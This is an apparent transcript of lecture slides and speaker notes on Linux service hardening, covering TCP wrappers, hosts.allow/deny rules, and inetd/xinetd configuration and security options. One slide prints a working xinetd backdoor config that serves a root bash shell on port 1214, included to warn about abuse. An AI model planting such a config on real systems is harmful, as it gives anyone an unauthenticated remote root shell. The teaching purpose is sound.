tcp wrappertcp wrapper disadvantages services must be compiled with the libwrap library only works...
TRANSCRIPT
1
TCP Wrapper
Provides host-based access control to network services
It has the following features:Logging
Access ControlHost Name VerificationUser Name Verification
Spoofing Protection
2
TCP Wrapper
Has the following advantages over other network service control techniques:
Transparency to both the client host and the wrapped network service - Both the connecting client and the wrapped network service are unaware that TCP wrappers are in use. Allowed users are connected to the requested service while connections from disallowed clients fail
Centralized management of multiple protocols - TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management
3
TCP Wrapper Advantages
TCP wrappers provide the following advantages over other network service control techniques:
Transparency - both the connecting client and the wrapped network service are unaware that TCP wrappers are in use
Centralized management - TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management
4
TCP Wrapper Disadvantages
Services must be compiled with the libwrap library
Only works with a super-daemon such as inetd or xinetd
Ident service not reliable
Doesn’t wrap RPC services
TCP Wrappers is not a firewall replacement
5
TCP Wrapper Files
tcpd – TCP wrappers deamontcpdchk and tcpdmatch - test programs for tcpd/etc/hosts.allow - names of the hosts allowed/etc/hosts.deny - names of the hosts NOT allowed
Note: If the same client/user/ip is listed in both hosts.allow and hosts.deny, then hosts.allow takes precedence and access is permitted. If the client is listed in hosts.allow, then is access permitted. If the client is listed in hosts.deny, then access is denied. If no rules for the service are found in either file, or if neither file exists, access to the service is granted
6
TCP Wrapper Services
In order to gain the benefit of TCP wrappers, the service must be compiled to support the services
For example, to determine if sshd is compiled with TCP wrappers support type the command:
ldd /usr/sbin/sshd | grep libwrap
libwrap.so.0 => /lib64/libwrap.so.0 (0x0..
If not supported, rebuild program with option to support
7
TCP Wrapper Operation
tcpd intercepts connection request
tcpd evaluates connection attributes with host.allow/host.deny
If allowed, tcpd releases control of the connection to the requested service
If denied, tcpd does not release control of the connection
8
TCP Wrapper Configuration
/etc/hosts.allow and /etc/hosts.deny use the format:
daemon_list : client_list [ : option : \option : ... ]
Where,
daemon_list - a list of one or more daemons client_list - a list of one or more hosts
option - optional action list
9
TCP Wrapper Wildcards
The access control language supports explicit wildcards:
ALL - The universal wildcard, always matches
LOCAL - Matches host whose name does not contain a dot
UNKNOWN - Matches any unknown name/address
KNOWN - Matches any known name/address
PARANOID - Matches any host whose name does not match its address
10
TCP Wrapper Examples
Set default policy to deny all access (/etc/hosts.deny):
ALL: ALL Explicitly permit authorized hosts (/etc/hosts.allow): popd : 192.168.1.200 192.168.1.104
imapd : 192.168.1.0/255.255.255.0sendmail : 192.168.1.0/255.255.255.0sshd : .xyz.com
11
TCP Wrapper “twist” Option
Send a message back to the source of the attempted connection after it is dropped
append the following to /etc/hosts.allow:
ALL : .notallowed.com \: severity auth.info \: twist /bin/echo “Not allowed %d %h."
The message “Not allowed to use daemon from hostname.” will be returned for any daemon not previously configured in the access file. This sends a message back to the source of the attempted connection after it is dropped
12
TCP Wrapper “spawn” Option
Another possibility is to use spawn which runs commands on the local system and sends no message to the source of the attempted connection. For example, the following:
ALL : .malware.com \: spawn (/bin/echo “%a from %h \ attempted to access %d” >> \ /var/log/connections.log) \: deny
This will deny all connection attempts from *.malware.com and log the hostname, IP address, and the accessed daemon to /var/log/connections.log.
13
Network Super Server
Listen for network connection on behalf of another program
Hands off control of that connection to intended server
Help reduce memory load and improve security
There are two different super servers:inetd use TCP Wrappers to handle securityxinetd has builtin security features
Servers that normally use super server: telnet, FTP, TFTP, rlogin, finger, POP, IMAP
14
inetd Configuration
service socket protocol {wait|nowait} user server parms
service name of the service from /etc/servicessocket can be stream, dgram or rawprotocol can be tcp or udpwait/nowait wait for dgram and nowait for other typesuser username used to run the serverserver server binary file, usually /usr/sbin/tcpdparms parameters that are passed to the server
ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd
15
xinetd Configuration
service ftp{
socket_type = streamprotocol = tcpwait = nouser = ftpserver = /usr/sbin/in.ftpdserver_args = -i disable = no
}
Disable a service: change disable to yesTo restart the xinetd service:
/etc/init.d/xinetd {restart|reload}
16
xinetd Security Enhancements
Listen to only one network interface for the service:bind = <IP Address>
Accept connections only from IP addresses:only_from = <IP Addresses|Network>
Deny connections only from IP addresses:no_access = <IP Addresses|Network>
Set times during which users may access the server:access_times = hour:min-hour:min
If access is prohibited, send banner to client:banner = /usr/local/etc/deny_banner
17
To Run or Not to Run xinetd
To run:Conserves resourcesRuns daemons only when neededProvides an additional layer of security and canTurn virtually any script or program into a service
Not to run:Another vulnerable serviceCan secure services using other methodsCan be used to create a backdoor listener
18
xinetd Backdoor Listener
service kazaa{ disable = no protocol = tcp socket_type = stream wait = no user = root server = /bin/bash server_args = -i }
xinetd reads this file and determines port from /etc/services
19
Evaluation Order
Rejected
TCP Wrapped Network ServiceTCP Wrapped
Network Servicexinetd Controlled Network Servicexinetd Controlled Network Service
FirewallFirewall
TCP WrappersTCP Wrappers
xinetdxinetd
Allowed
Allowed
Allowed
20
Disable Services/Interfaces
Disable DHCP, configure static IP
Disable, remove, unused protocols such as IPv6
Disable wireless networking (to include Bluetooth)
Disable/remove clear text protocols and use their secure replacement
1
TCP Wrapper
Provides host-based access control to network services
It has the following features:Logging
Access ControlHost Name VerificationUser Name Verification
Spoofing Protection
The TCP wrappers package (tcp_wrappers) is typically installed by default on current distributions and provides host-based access control to network services.
It has the following features:Logging - Connections that are monitored by the
TCP wrappers daemon (tcpd) are reported through the syslog facility.
Access Control - tcpd supports a simple form of access control that is based on pattern matching. You can also hook the execution of shell commands and scripts when a pattern matches and IP address/mask.
Host Name Verification - tcpd verifies the client host name that is returned by the address->name DNS server by looking at the host name and address that are returned by the name->address DNS server.
User Name Verification - tcpd verifies the username through ident query replies
Spoofing Protection – can verify host name to IP address mapping and to reject packets with IP source routing
1
2
TCP Wrapper
Has the following advantages over other network service control techniques:
Transparency to both the client host and the wrapped network service - Both the connecting client and the wrapped network service are unaware that TCP wrappers are in use. Allowed users are connected to the requested service while connections from disallowed clients fail
Centralized management of multiple protocols - TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management
The TCP wrappers package (tcp_wrappers) is typically installed by default on current distributions and provides host-based access control to network services.
It has the following features:Logging - Connections that are monitored by the
TCP wrappers daemon (tcpd) are reported through the syslog facility.
Access Control - tcpd supports a simple form of access control that is based on pattern matching. You can also hook the execution of shell commands and scripts when a pattern matches and IP address/mask.
Host Name Verification - tcpd verifies the client host name that is returned by the address->name DNS server by looking at the host name and address that are returned by the name->address DNS server.
User Name Verification - tcpd verifies the username through ident query replies
Spoofing Protection – can verify host name to IP address mapping and to reject packets with IP source routing
2
3
TCP Wrapper Advantages
TCP wrappers provide the following advantages over other network service control techniques:
Transparency - both the connecting client and the wrapped network service are unaware that TCP wrappers are in use
Centralized management - TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management
TCP wrappers provide the following advantages over other network service control techniques:
Transparency to both the client host and the wrapped network service — Both the connecting client and the wrapped network service are unaware that TCP wrappers are in use. Legitimate users are logged and connected to the requested service while connections from banned clients fail.
Centralized management of multiple protocols — TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management.
3
4
TCP Wrapper Disadvantages
Services must be compiled with the libwrap library
Only works with a super-daemon such as inetd or xinetd
Ident service not reliable
Doesn’t wrap RPC services
TCP Wrappers is not a firewall replacement
Disadvantages:
Services must be compiled with the libwrap library.
Only works with in conjunction with a super-daemon such as inetd or xinetd.
Ident service not reliable - It is nearly impossible for the administrators of the remote service to know whether specific users are connecting via a trustable server or from a computer they themselves control. In the latter case the ident service provides no reliable information.
Doesn’t wrap RPC services.
TCP Wrappers is not a replacement for a firewall, it should be used in conjunction with a firewall and other security enhancements.
4
5
TCP Wrapper Files
tcpd – TCP wrappers deamontcpdchk and tcpdmatch - test programs for tcpd/etc/hosts.allow - names of the hosts allowed/etc/hosts.deny - names of the hosts NOT allowed
Note: If the same client/user/ip is listed in both hosts.allow and hosts.deny, then hosts.allow takes precedence and access is permitted. If the client is listed in hosts.allow, then is access permitted. If the client is listed in hosts.deny, then access is denied. If no rules for the service are found in either file, or if neither file exists, access to the service is granted
Advantages:Logs and applies access controls to remote
connectionsLets you define which daemons are wrappedPerforms reverse lookup on host IPs
Disadvantages:Ident service not reliableOnly looks at network daemons spawned by inetd
(xinetd has its own way of performing this function)Doesn’t wrap ALL services (RPC)Could give a false sense of security
tcpdchk and tcpdmatch - test programs for tcpd/etc/hosts.allow - This file describes the names of the hosts which are allowed to use the local INET services, as decided by the /usr/sbin/tcpd server./etc/hosts.deny - This file describes the names of the hosts which are NOT allowed to use the local INET services, as decided by the /usr/sbin/tcpd server.
NOTE:If the same client/user/ip is listed in both hosts.allow and hosts.deny, then hosts.allow takes precedence and access is permitted.If the client is listed in hosts.allow, then is access permitted.If the client is listed in hosts.deny, then access is denied.If no rules for the service are found in either file, or if neither file exists, access to the service is granted.
5
6
TCP Wrapper Services
In order to gain the benefit of TCP wrappers, the service must be compiled to support the services
For example, to determine if sshd is compiled with TCP wrappers support type the command:
ldd /usr/sbin/sshd | grep libwrap
libwrap.so.0 => /lib64/libwrap.so.0 (0x0..
If not supported, rebuild program with option to support
In order to gain the benefit of TCP wrappers, the service must be compiled to support the services.
To determine if the service you wish to protect with TCP wrappers is built with TCP wrappers support use the command ldd which prints shared library dependencies. For example, to determine if sshd is compiled with TCP wrappers support type the command:
ldd /usr/sbin/sshd
linux-vdso.so.1 => (0x00007fff54dfe000)
libfipscheck.so.1 => /lib64/libfipscheck.so.1 (0x00007f3b00489000)
libwrap.so.0 => /lib64/libwrap.so.0 (0x00007f3b0027e000)
libaudit.so.1 => /lib64/libaudit.so.1 (0x00007f3b00057000)
libpam.so.0 => /lib64/libpam.so.0 (0x00007f3affe49000)
libselinux.so.1 => /lib64/libselinux.so.1 (0x00007f3affc26000)
libcrypto.so.10 => /lib64/libcrypto.so.10 (0x00007f3aff846000)
........................
The output of this command was considerably more, but you can look through the list to find the library libwrap, and it is found the third line down. You can optionally use grep to search for libwrap
If the service doesn’t support TCP wrappers, check vendor downloads or the documentation on how to build with TCP wrappers support. You may have to use a different flavor of the service to support TCP wrappers. That is there are several variations of ftp deamons to download and some may not support TCP wrappers. Download and install one that does.
When a connection attempt is made to a TCP wrapped service, the service first references the hosts access files (/etc/hosts.allow and /etc/hosts.deny) to determine whether or not the client host is allowed to connect. In most cases, it then uses the syslog daemon (syslogd) to write the name of the requesting host and the requested service to /var/log/secure or /var/log/messages.
If a client host is allowed to connect, TCP wrappers release control of the connection to the requested service and do not interfere further with communication between the client host and the server.
In addition to access control and logging, TCP wrappers can activate commands to interact with the client before denying or releasing control of the connection to the requested network service.
Because TCP wrappers are a valuable addition to any server administrator's collection of security tools, most network services shipped with Ret Hat flavors of Linux are linked against the libwrap.a library. Some such applications include /usr/sbin/sshd, /usr/sbin/sendmail, and /usr/sbin/xinetd.
6
7
TCP Wrapper Operation
tcpd intercepts connection request
tcpd evaluates connection attributes with host.allow/host.deny
If allowed, tcpd releases control of the connection to the requested service
If denied, tcpd does not release control of the connection
When a connection attempt is made to a TCP wrapped service, the tcpd service first references the hosts access files (/etc/hosts.allow and /etc/hosts.deny) to determine if the client host is allowed to connect. If configured, and it should be, the name of the requesting host and the requested service is written using syslog.
If a client host is allowed to connect, TCP wrappers release control of the connection to the requested service and do not interfere further with communication between the client host and the server.
If a client is not allowed to connect, TCP wrappers does not release control of the connection to the requested service.
In addition to access control and logging, TCP wrappers can activate commands to interact with the client before denying or releasing control of the connection to the requested network service.
7
8
TCP Wrapper Configuration
/etc/hosts.allow and /etc/hosts.deny use the format:
daemon_list : client_list [ : option : \option : ... ]
Where,
daemon_list - a list of one or more daemons client_list - a list of one or more hosts
option - optional action list
Both /etc/hosts.allow and /etc/hosts.deny uses the following format:
daemon_list : client_list [ : option : option : .... ]
Where,
daemon_list - a list of one or more daemon process names.
client_list - a list of one or more host names, host addresses, patterns or wildcards that will be matched against the client host name or address.
option - optional action or colon-separated list of actions performed when the rule is triggered. Option fields support expansions, launch shell commands, allow or deny access, and alter logging behavior.
8
9
TCP Wrapper Wildcards
The access control language supports explicit wildcards:
ALL - The universal wildcard, always matches
LOCAL - Matches host whose name does not contain a dot
UNKNOWN - Matches any unknown name/address
KNOWN - Matches any known name/address
PARANOID - Matches any host whose name does not match its address
WildCards - the access control language supports explicit wildcards:
ALL - The universal wildcard, always matches.
LOCAL - Matches any host whose name does not contain a dot character.
UNKNOWN - Matches any user whose name is unknown, and matches any host whose name or address are unknown. This pattern should be used with care: host names may be unavailable due to temporary name server problems. A network address will be unavailable when the software cannot figure out what type of network it is talking to.
KNOWN - Matches any user whose name is known, and matches any host whose name and address are known. This pattern should be used with care: host names may be unavailable due to temporary name server problems. A network address will be unavailable when the soft-ware cannot figure out what type of network it is talking to.
PARANOID - Matches any host whose name does not match its address. When tcpd is built with -DPARANOID (default mode), it drops requests from such clients even before looking at the access control tables. Build without -DPARANOID when you want more control over such requests.
9
10
TCP Wrapper Examples
Set default policy to deny all access (/etc/hosts.deny):
ALL: ALL Explicitly permit authorized hosts (/etc/hosts.allow): popd : 192.168.1.200 192.168.1.104
imapd : 192.168.1.0/255.255.255.0sendmail : 192.168.1.0/255.255.255.0sshd : .xyz.com
TCPD Configuration Examples
Set default policy to deny all access. Edit the file /etc/hosts.deny as follows:
ALL: ALL Once the default deny policy is applied, you have to explicitly permit authorized hosts by adding them to the /etc/hosts.allow:
popd : 192.168.1.200 192.168.1.104
imapd : 192.168.1.0/255.255.255.0sendmail : 192.168.1.0/255.255.255.0sshd : .xyz.com
Restrict all connections to non-public services to localhost only. Suppose sshd and ftpd are the names of service which must be accessed remotely. Edit /etc/hosts.allow. Add the following lines:
sshd ,ftpd : ALLALL: localhost
10
11
TCP Wrapper “twist” Option
Send a message back to the source of the attempted connection after it is dropped
append the following to /etc/hosts.allow:
ALL : .notallowed.com \: severity auth.info \: twist /bin/echo “Not allowed %d %h."
The message “Not allowed to use daemon from hostname.” will be returned for any daemon not previously configured in the access file. This sends a message back to the source of the attempted connection after it is dropped
Suppose that a situation occurs where a connection should be denied and a reason should be sent to the source of the attempted connection. That action is possible with twist. When a connection attempt is made, twist executes a shell command or script and sends it to the source of the attempted connection. For example, append the following to /etc/hosts.allow:
ALL : .notallowed.com \: severity auth.info \: twist /bin/echo "You are not
welcome to use %d from %h."
In this example, the message “You are not allowed to use daemon from hostname.” will be returned for any daemon not previously configured in the access file. This sends a message back to the source of the attempted connection after it is dropped. Any message returned must be enclosed in in quotes.
spawn and twist variables:%a - The client's IP address.%A - The server's IP address.%c - Supplies a variety of client information, such as the username and hostname, or the username and IP address.
%d - The daemon process name.%h - The client's hostname (or IP address, if the hostname is unavailable).
%H - The server's hostname (or IP address, if the hostname is unavailable).
%n - The client's hostname. If unavailable, unknown is printed. If the client's hostname and host address do not match, paranoid is printed.
%N - The server's hostname. If unavailable, unknown is printed. If the server's hostname and host address do not match, paranoid is printed.
%p - The daemon process ID.%s - Various types of server information, such as the daemon process and the host or IP address of the server.
%u - The client's username. If unavailable, unknown is printed.
11
12
TCP Wrapper “spawn” Option
Another possibility is to use spawn which runs commands on the local system and sends no message to the source of the attempted connection. For example, the following:
ALL : .malware.com \: spawn (/bin/echo “%a from %h \ attempted to access %d” >> \ /var/log/connections.log) \: deny
This will deny all connection attempts from *.malware.com and log the hostname, IP address, and the accessed daemon to /var/log/connections.log.
Another possibility is to use spawn which runs commands on the local system and sends no message to the source of the attempted connection. For example, the following:
ALL : .malware.com \: spawn (/bin/echo %a from %h
attempted to access %d >> \ /var/log/connections.log) \: deny
This will deny all connection attempts from *.malware.com and log the hostname, IP address, and the daemon to which access was attempted to /var/log/connections.log.
spawn and twist variables:%a - The client's IP address.%A - The server's IP address.%c - Supplies a variety of client information, such as the username and hostname, or the username and IP address.
%d - The daemon process name.%h - The client's hostname (or IP address, if the hostname is unavailable).
%H - The server's hostname (or IP address, if the hostname is unavailable).
%n - The client's hostname. If unavailable, unknown is printed. If the client's hostname and host address do not match, paranoid is printed.
%N - The server's hostname. If unavailable, unknown is printed. If the server's hostname and host address do not match, paranoid is printed.
%p - The daemon process ID.%s - Various types of server information, such as the daemon process and the host or IP address of the server.
%u - The client's username. If unavailable, unknown is printed.
12
13
Network Super Server
Listen for network connection on behalf of another program
Hands off control of that connection to intended server
Help reduce memory load and improve security
There are two different super servers:inetd use TCP Wrappers to handle securityxinetd has builtin security features
Servers that normally use super server: telnet, FTP, TFTP, rlogin, finger, POP, IMAP
Unix super servers:
Listen for network connection on behalf of another program
Hands off control of that connection to intended server
Help reduce memory load and improve security
There are two different super servers:inetd use TCP Wrappers to handle
securityxinetd has builtin security features
inetd is often referred to as a "super server." A newer super server, xinetd, has replaced inetd; however, there are still systems in place that use inetd. Both pieces of software serve the same purpose, but xinetd is considered more secure and flexible as it offers many features to restrict and throttle access when a system's load rises; therefore, it is chosen over inetd. A system can run either inetd or xinetd but not both.
Servers that normally use super server: telnet, FTP, TFTP, rlogin, finger, POP, IMAP
13
14
inetd Configuration
service socket protocol {wait|nowait} user server parms
service name of the service from /etc/servicessocket can be stream, dgram or rawprotocol can be tcp or udpwait/nowait wait for dgram and nowait for other typesuser username used to run the serverserver server binary file, usually /usr/sbin/tcpdparms parameters that are passed to the server
ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd
inetd has been deprecated by xinetd, so it is recommended to replace it with xinetd.
You may run into existing systems using inetd, so it is good to know how to read the configuration so you can convert from inetd format to xinetd.
Main configuration file:
/etc/inetd.conf
Other configuration files typically in /etc/inetd.d/
Syntax:service socket protocol {wait|nowait} user server parms
service name of the service as described in /etc/services
socket can be stream, dgram or rawprotocol can be tcp or udpwait/nowait wait for dgram socket and nowait for other socket types
user username used to run the serverserver server binary file, usually the TCP Wrappers (/usr/sbin/tcpd)
parms parameters that are passed to the server
Example:ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd
Disable a service:
add # at the beginning of line
Restarting inetd service:
/etc/init.d/inetd restart
14
15
xinetd Configuration
service ftp{
socket_type = streamprotocol = tcpwait = nouser = ftpserver = /usr/sbin/in.ftpdserver_args = -i disable = no
}
Disable a service: change disable to yesTo restart the xinetd service:
/etc/init.d/xinetd {restart|reload}
Configuration file:
/etc/xinetd.conf
Files in /etc/xinetd.d/ are included
Each server run via xinetd installs a file in /etc/xinetd.d
Syntax of /etc/xinetd.conf
Example:
service ftp{
socket_type = streamprotocol = tcpwait = nouser = rootserver = /usr/sbin/in.ftpdserver_args = -idisable = no
}
Disable a service:
Change disable to yes
To restart the xinetd service:
/etc/init.d/xinetd restart
To enhance security, the “user” should not be root for services. If the service is compromised then it is likely that the attacker will attain the access of the service.
15
16
xinetd Security Enhancements
Listen to only one network interface for the service:bind = <IP Address>
Accept connections only from IP addresses:only_from = <IP Addresses|Network>
Deny connections only from IP addresses:no_access = <IP Addresses|Network>
Set times during which users may access the server:access_times = hour:min-hour:min
If access is prohibited, send banner to client:banner = /usr/local/etc/deny_banner
Using the following options in /etc/xinetd.conf
Listen to only one network interface for the service:
bind = <IP Address>
Accept connections only from IP addresses (similar to TCP Wrapper’s host.allow):
only_from = <IP Addresses|Network>
Deny connections only from IP addresses (similar to TCP Wrapper’s host.deny):
no_access= <IP Addresses|Network>
Set times during which users may access the server:
access_times = hour:min-hour:min
If access is prohibited, send the contents of the file /usr/local/etc/deny_banner to the client:
banner = /usr/local/etc/deny_banner
16
17
To Run or Not to Run xinetd
To run:Conserves resourcesRuns daemons only when neededProvides an additional layer of security and canTurn virtually any script or program into a service
Not to run:Another vulnerable serviceCan secure services using other methodsCan be used to create a backdoor listener
Reasons to run xinetd:
xinetd conserves resources, runs daemons only when needed, provides an additional layer of security and can "box" a service into a directory with "change root.“, and it can turn virtually any script or program into a service (this can be bad, see next).
Reasons to not run xinetd:
Like any additional service, it has suffered from vulnerabilities. Although, there are currently no known vulnerabilities, that doesn’t mean they are not there. Another thought, if the service is secure and offers a secure method of authentication, then a super server isn’t required as the authentication will permit or deny those based on credentials, and other tweaking can be performed by the firewall.
An attacker can use xinetd to create a backdoor into the system.
17
18
xinetd Backdoor Listener
service kazaa{ disable = no protocol = tcp socket_type = stream wait = no user = root server = /bin/bash server_args = -i }
xinetd reads this file and determines port from /etc/services
Here is an example of a xinetd backdoor listener:
Create an file in /etc/xinetd.d/kazaa
service kazaa{ disable = no protocol = tcp socket_type = stream wait = no user = root server = /bin/bash server_args = -i }
When xinetd starts, it will read this file, it determines the port from /etc/services:
kazaa 1214/tcp # KAZAA
in this case, it will create backdoor shell listening on port 1214.
18
19
Evaluation Order
Rejected
TCP Wrapped Network ServiceTCP Wrapped
Network Servicexinetd Controlled Network Servicexinetd Controlled Network Service
FirewallFirewall
TCP WrappersTCP Wrappers
xinetdxinetd
Allowed
Allowed
Allowed
The firewall, TCP wrappers, and xinetd function independently of each other and each provide a layer of protection. When troubleshooting connectivity problems when using these services together, follow the chart and watch the logs to find the service responsible.
19
20
Disable Services/Interfaces
Disable DHCP, configure static IP
Disable, remove, unused protocols such as IPv6
Disable wireless networking (to include Bluetooth)
Disable/remove clear text protocols and use their secure replacement
Network Interfaces and protocols:
Most distributions use DHCP by default. For enhanced security, configure a static IP address. This ensures the system maintains the same address at all times and any external system such as a firewall or IDS is protecting this system as it maintains its static IP address. Another solution would be to use a reservation in DHCP.
Disabled unused protocols such as IPv6. This prevents attackers from using protocols that you may not be monitoring.
Wireless networking presents a risk to leakage of information. The best solution is to remove the wireless hardware, but if that is not feasible, then the drivers can be removed. Although Bluetooth “supposedly” has a limited range, there are proof of concept interception of Bluetooth signals from a fairly large distance.
It may also be possible to disable wireless in the BIOS.
Disable/remove all clear text protocols. Use other options such as SSH.
20